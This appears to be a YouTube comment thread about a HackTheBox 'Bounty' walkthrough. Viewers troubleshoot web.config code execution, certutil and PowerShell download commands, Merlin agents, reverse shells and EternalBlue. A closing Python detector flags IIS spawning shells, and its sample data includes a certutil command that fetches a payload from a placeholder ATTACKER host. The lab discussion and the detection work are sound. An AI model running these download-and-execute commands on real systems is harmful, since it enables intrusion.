tell me one reason to classify this as a box for beginners
Because its easy
@Watson Joe who names their kid Watson joe? Stop trying to scam people
@@chiraqsoulja you dont look cool by saying that its easy
You didn't get any response back from the server after accessing the "web.config" because the response is an HTML comment. Look at the source code. There you can see the response.
🙏Thank you for all the great videos IppSec! You are a master ninja ⚔️
This box was pretty unstable and sometimes the shell via web.config did not work.
Yep. There was a point in the video where that happened. Programs behave unexpectedly when you bend their will and make them do things they aren't meant to do.
@@ippsec I found that if 3+ users are simultaneously trying to get that with web.config, the page gives an unexpected error. The thing is, after you try to upload again, the payload is not recognized. I don't know how this is working...
Maybe a tip for anyone having issues with merlin: Time must be exact both on server and client.
But like always great vid!
Could you clarify what you mean by this? I was never able to get Merlin agent to connect with the listener. Everything seemed to be working fine. Even had a reverse shell on the box to confirm execution, captured packets, tried multiple merlin versions. I could get the agent on the box and executing and the listener running on the correct local IP and port. The agent never picks it up.
@@semiranotics2753 It was a long time ago... But make sure that client and server have the correct time, otherwise the handshake will fail, since auth has a time factor
How did you set up your Go environment? I get nothing but errors when running 'go run cmd/merlinserver/main.go'. This is after setting the GOPATH variable to $HOME/go. I've also tried setting the variable to $HOME/hackthebox/bounty/merlin. No dice. Thanks for the videos!
Without the errors, it's pretty hard to help. I'd guess it's dependency issues; watch the Rabbit video. When you have issues you can just search "ippsec " and find other videos I used it in.
@@ippsec Thanks! That helped me sort out what I had wrong.
Great work, appreciated. Big fan
Great as always
Lost it at "unsupported? you're unsupported"
42:45 --> Best moment of the video
Great video - one quick question; I used the PowerShell IEX(New-Object Net.WebClient).downloadFile instead of .downloadString; somehow it appears not to be working well. Are there any specific reasons?
You didn't set the LHOST properly for the EternalBlue exploit. You set it to tun0, but the IP was localhost, so it was just trying to connect back to Merlin instead of your listener on your tun0 IP.
Awesome as usual? Reason you use -sC -sV over -A? Less chars typed is ❤ for ctfs. Keep em coming!
No reason. Just personal preference to be verbose. When I had first read about it, I saw -A was "aggressive", which sounded dangerous for an initial port scan.
The user flag is a link, how did you get it?
Learn !!!
Go into the `C:\Users\merlin\Desktop` directory. There you can display its hidden children with the PowerShell command: `Get-ChildItem . -Force`
As you can see, the output to the console reveals a `user.txt` file.
You can run `Get-ChildItem . -Force > user`
Then simply run `type user.txt` and the md5 hash should be returned.
Docs: docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-childitem?view=powershell-7.1
@IppSec dumb question but where do you get your shells is it just from over the years of collecting them ? Or is there a good GitHub site to get a bunch of them ?
Pretty sure every shell I use on these videos is created in a previous video, or explained where I grabbed it from. I only use this VM for videos
Did you ever make a mapping between your videos and the tools/techniques/OS used? If so, please do share; if not, I guess I will have to do it myself ......🤓
Nope. Notes are all on you, if you know what you’re looking for you can just do a TH-cam search for that. Ex. ippsec union injection
You can try ippsec.rocks
Is there a reason why rotten potato doesn't work (and neither does Tater.ps1), but juicy potato does?
Hi, new subscriber here and just watched the video now. First of all, thanks for all the great content. I think your videos are great. I like the pace and depth of content, and I have to admit, they also make you laugh from time to time :-) As for the MS17-010 fail, could it be because, even though you did create the portfwd rules, you always ran the exploit with RHOST set to 445, so you were actually not attacking the other ports? I know this is 9 months later and you must have figured out the reason already, but just my 2 cents.
Hi! I have a VBScript RCE on the box. When I use it with ping.exe and my IP address I get requests from the box. So this is working: code exec and the back connection. When I try to start powershell.exe with the absolute path it responds without errors. But if I use ping in the PS it does not work. downloadString does not work either. I have no way to see error messages.
In general: Is there a way of getting a reverse_shell without PS or through VBScript? Is there a cmd.exe reverse shell?
And what could I do for further testing? I do not want to use Merlin..
btw: Ippsec, your videos are awesome and I cannot tell how much I already learned! Thank soo much!
CMD does not have a reverse shell. You could code one in VBScript or upload something like nc. You could assign PowerShell output to a variable and print it out via VBScript, the same way it printed 1+2 earlier in the video.
Thanks! I definitely learned a lot about the importance between "cmd" and "cmd /c" and using \\ instead of \ @@ippsec
Why did you use an HTTPS reverse shell in part 2 when you pwn using Metasploit? Would a standard TCP reverse shell not have worked?
I don't remember. Generally I just like reverse_https because it's encrypted and won't die if it cannot talk back to the C2. Do a reverse_tcp and restart MSF, you lose the shell. With http/s you'll get the shell back when you start MSF back up.
For some reason I cannot execute anything on this box. Ping works, download as well, but it will not execute anything. Tried to revert the box multiple times, I'm alone on the lab, but the rev shell just never calls back.
merlin is useful nowadays?
Great vid as always!
Hi, sorry for the stupid question but why you use certutil to download the agent on the machine ?
There aren't a lot of good ways to download files from a command prompt. Unlike Linux, you can't just curl on Windows. It is possible to use PowerShell to do Invoke-WebRequest or (New-Object Net.WebClient).DownloadFile -- but that's a lot of typing.
IppSec sure!! Thanks 👍🏽
11:43 -- you did nothing wrong on your whoami command, the output was just commented on the response page...
Unable to connect to Merlin when I upload web.config... tried almost a day, everything seems perfect. But still no connection received in Merlin... can you please help???
Did you ever get this figured out? I was never able to get Merlin agent to connect with the listener. Everything seemed to be working fine. Even had a reverse shell on the box to confirm execution, captured packets, tried multiple merlin versions. I could get the agent on the box and executing and the listener running on the correct local IP and port. The agent never picks it up.
@@semiranotics2753 Sadly I wasn't able to figure it out and moved forward... I can only hope that I will never have to use Merlin again... lol
Any idea why I can't get usual cmd commands to work on Merlin? Like dir, it says not on path.
I know some time has gone by since your comment, but let me know if you're still having problems. The command you want to run has to be in the %PATH% variable. Often the problem is that you need to specify a shell to execute the command in, like "cmd.exe /c whoami" or "/bin/bash cat /etc/passwd". Hope this helps.
my migrate is not working which is really annoying.
Do you use Kali as VM or host machine?
Kali as vm and run openvpn htb
"unsupported? you're unsupported" - ippsec :D
You should do a video using JexBoss for a java app.
awesome
I can't access by OpenVPN... it says... private key password verification fails... need help
If issue is still happening, regenerate your certificate. It's under "Access" on the left hand side.
@@ippsec Yes... it works....
Hi. The video is amazing. Actually your trick to use EternalBlue after forwarding the port is working; you just need to set LHOST as your real IP because, I don't know why, it was set to localhost.
I mean the reverse shell config. You can check 45:22 in the video.
@@276rachid Yeah, I'm not sure - I had edited the description a day or two ago. Definitely did "set LHOST tun0" twice before doing EB. Hard to read something while saying a different thing; didn't see it listening on 127.0.0.1. Sad that bug happened, but at least what I was trying to show worked (portfwd).
[Seeking Help] Not sure if anyone encountered the same error as me (I scrolled through the comments and did not find anyone in the same situation), but I encountered this error when I was running "10.10.10.93/uploadedfiles/web.config" after uploading my web.config with the certutil command that IppSec posted:
**** Online **** 000000 ... bef400 CertUtil: -URLCache command FAILED: 0x80070005 (WIN32: 5) CertUtil: Access is denied.
I noticed that in IppSec's case, his browser returned an empty page after it finished loading, while mine returned this error message about certutil above.
I had reverted the machine and tried this on more than one occasion, with the same error message. After I got this error message, I modified my web.config with the parameters "cmd /c cd ..\..\..\Users\Public & dir" to check if agent.exe was now on the machine, and yes it is: "12,514,304 agent.exe".
However, I tried to get the reverse connection with "cmd /c C:\users\public\agent.exe" in my web.config and "root@kali:~/merlin# go run cmd/merlinserver/main.go -i [IP address of tun0 interface]", but this did not work out.
Can't get it to work either :(
Can't get Merlin to work, looks like I have some path problem. Anyone know how to fix it? I've checked the docs already.
No idea. Without error messages I doubt anyone will be able to help
I think I have the same issue. It seems that Go cannot find the package from GitHub. Do you have any solution?
@@ippsec root@localhost:~/tools/merlin# go run cmd/merlinserver/main.go
cmd/merlinserver/main.go:34:2: cannot find package "github.com/Ne0nd0g/merlin/pkg" in any of:
/usr/lib/go-1.10/src/github.com/Ne0nd0g/merlin/pkg (from $GOROOT)
/root/go/src/github.com/Ne0nd0g/merlin/pkg (from $GOPATH)
cmd/merlinserver/main.go:29:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/banner" in any of:
/usr/lib/go-1.10/src/github.com/Ne0nd0g/merlin/pkg/banner (from $GOROOT)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/banner (from $GOPATH)
cmd/merlinserver/main.go:33:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/cli" in any of:
/usr/lib/go-1.10/src/github.com/Ne0nd0g/merlin/pkg/cli (from $GOROOT)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/cli (from $GOPATH)
cmd/merlinserver/main.go:32:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/core" in any of:
/usr/lib/go-1.10/src/github.com/Ne0nd0g/merlin/pkg/core (from $GOROOT)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/core (from $GOPATH)
cmd/merlinserver/main.go:31:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/logging" in any of:
/usr/lib/go-1.10/src/github.com/Ne0nd0g/merlin/pkg/logging (from $GOROOT)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/logging (from $GOPATH)
cmd/merlinserver/main.go:30:2: cannot find package "github.com/Ne0nd0g/merlin/pkg/servers/http2" in any of:
/usr/lib/go-1.10/src/github.com/Ne0nd0g/merlin/pkg/servers/http2 (from $GOROOT)
/root/go/src/github.com/Ne0nd0g/merlin/pkg/servers/http2 (from $GOPATH)
cmd/merlinserver/main.go:26:2: cannot find package "github.com/fatih/color" in any of:
/usr/lib/go-1.10/src/github.com/fatih/color (from $GOROOT)
/root/go/src/github.com/fatih/color (from $GOPATH)
@@erikkovacs5744 Did you try running go get and the package?
@@dbiviss Use go get to download packages. Search "ippsec merlin" or "ippsec go" or something to find other videos I use it in. Chances are I go over installing dependencies in earlier videos.
w3wp is IIS!
Yeah..I was about to say that
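Picking up on "w3wp is IIS!": the chain this thread keeps debugging (web.config runs "cmd /c ...", which runs certutil to pull down agent.exe) is exactly what a defender sees as the IIS worker process spawning a shell. The following is an added detection example, not code from the video or from IppSec; it runs over constructed Sysmon-style process-creation records (field names are Sysmon's, the GUIDs and the ATTACKER host are placeholders chosen here).

```python
import json
import ntpath

# Processes a web server's IIS worker (w3wp.exe) has no business launching;
# a malicious web.config or web shell that runs commands shows up here.
IIS_WORKER = "w3wp.exe"
SHELLS_AND_LOLBINS = {"cmd.exe", "powershell.exe", "certutil.exe",
                      "cscript.exe", "wscript.exe"}
CERTUTIL_FETCH_FLAGS = ("-urlcache", "-decode")

# Constructed sample of Sysmon Event ID 1 (process creation) records, exported
# as JSON lines the way a SIEM might. GUIDs are placeholders, not real values.
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ProcessGuid": "{A}", "ParentProcessGuid": "{S}",
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": 'w3wp.exe -ap "DefaultAppPool"'},
    {"ProcessGuid": "{B}", "ParentProcessGuid": "{A}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "cmd /c whoami"},
    {"ProcessGuid": "{C}", "ParentProcessGuid": "{B}",
     "Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -urlcache -split -f http://ATTACKER/agent.exe C:\Users\Public\agent.exe"},
    {"ProcessGuid": "{D}", "ParentProcessGuid": "{E}",
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
])


def parse_events(text):
    """Parse JSON-lines process-creation records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect(events):
    """Return (rule, ProcessGuid, CommandLine) findings, in event order.

    Assumes records arrive parent-before-child, as Sysmon emits them, so a
    single pass can taint the whole process tree below a w3wp-spawned shell.
    """
    findings = []
    tainted = set()  # GUIDs of processes descended from an IIS-spawned shell
    for ev in events:
        image = ntpath.basename(ev["Image"]).lower()
        parent = ntpath.basename(ev["ParentImage"]).lower()
        if parent == IIS_WORKER and image in SHELLS_AND_LOLBINS:
            findings.append(("iis_worker_spawned_shell", ev["ProcessGuid"], ev["CommandLine"]))
            tainted.add(ev["ProcessGuid"])
        elif ev["ParentProcessGuid"] in tainted:
            findings.append(("descendant_of_iis_shell", ev["ProcessGuid"], ev["CommandLine"]))
            tainted.add(ev["ProcessGuid"])
        # certutil fetching or decoding a payload is suspicious whatever its parent
        if image == "certutil.exe" and any(f in ev["CommandLine"].lower() for f in CERTUTIL_FETCH_FLAGS):
            findings.append(("certutil_download", ev["ProcessGuid"], ev["CommandLine"]))
    return findings


if __name__ == "__main__":
    for rule, guid, cmd in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{rule:26} {guid:4} {cmd}")
```

On the sample, the cmd.exe under w3wp.exe fires the first rule, the certutil it launches is caught both as a descendant and by its -urlcache flag, and notepad under explorer is ignored.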
What's HackTheBox used for?